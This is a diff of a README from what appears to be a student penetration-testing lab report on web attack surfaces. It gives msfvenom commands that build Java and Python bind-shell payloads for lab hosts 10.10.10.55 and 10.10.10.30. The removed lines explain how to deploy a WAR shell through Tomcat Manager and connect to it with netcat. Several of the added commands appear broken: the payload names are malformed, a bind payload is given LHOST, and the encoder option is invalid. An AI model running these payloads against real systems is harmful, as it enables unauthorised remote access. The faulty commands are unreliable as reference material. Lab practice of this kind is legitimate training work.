Dorsaa-Francis/inpt_report/README.md

 ![aux](Images/auxiliary.png)

-# Web-Based Attack Surfaces
+### Web-Based Attack Surfaces

-Web-based attacks exploit vulnerabilities in web applications to gain unauthorized access, steal data, or disrupt services.
-Common attack types include SQL Injection, XSS, CSRF, File Inclusion, Command Injection, Broken Authentication, Directory Traversal, Security Misconfiguration, Insecure Deserialization, and SSRF.
-To protect against these attacks, employ secure coding practices, input validation, proper authentication mechanisms, and regularly update and configure your web applications and servers.
+Web-based attack surfaces encompass web application interfaces, authentication mechanisms, APIs, and server configurations.
+These areas can present security risks such as SQL injection or session hijacking.
+Key security measures include:

+- Input validation
+- Secure session management
+- Keeping software updated

+Addressing vulnerabilities in these areas helps protect against exploits and enhances overall web security.

+### Using Eyewitness for Web Server Screenshots

-To use eyewitness to take screenshots  of web severs including those running on non-standard HTTP/HTTPS ports, we use the following command:
+To take screenshots of servers, including those on non-standard HTTP/HTTPS ports, use the following bash command:

-eyewitness -f hosts.txt --web --resolve --ports 80,443.8080,8443
+eyewitness -f hosts.txt --web --resolve --ports 80,443,8080,8443

-#### Generating Payloads
+### Generating Payloads with msfvenom

-To use msfvenom to generate a payload that can trigger TCP bind shell, we use the command line;
+To generate a base64-encoded payload that triggers a TCP bind shell on execution on host 10.10.10.55 (Apache Tomcat), use this command:

-#### msfvenom -p java/jsp_shell_bind_tcp LPORT=4444 -f war -o bind_shell.war
+msfvenom -p java/meterpreter/bind-tcp LHOST=10.10.10.55 LPORT=4444 -f jar

-We then deploy the WAR file to the Tomcat server.
-We can do this by accessing the Tomcat Manager interface and uploading the bind_shell.war file.
-Now we can access the bind shell by connecting to the specified port on the target machine.
-For example, if you set the port to 4444, you can use netcat to connect:

-#### nc 10.10.10.55 4444
+For a payload that triggers a TCP bind shell on execution on host 10.10.10.30 (Python Server), use this command:

+msfvenom -p python/meterpreter/bind-tcp LHOST=10.10.10.30 LPORT=4444 -e base64

+These commands will help you create the necessary payloads for your penetration testing tasks.
 ![web_attack-surfaces_1](Images/web_attack-surfaces_1.png)

 ![WBAS](Images/WBAS.png)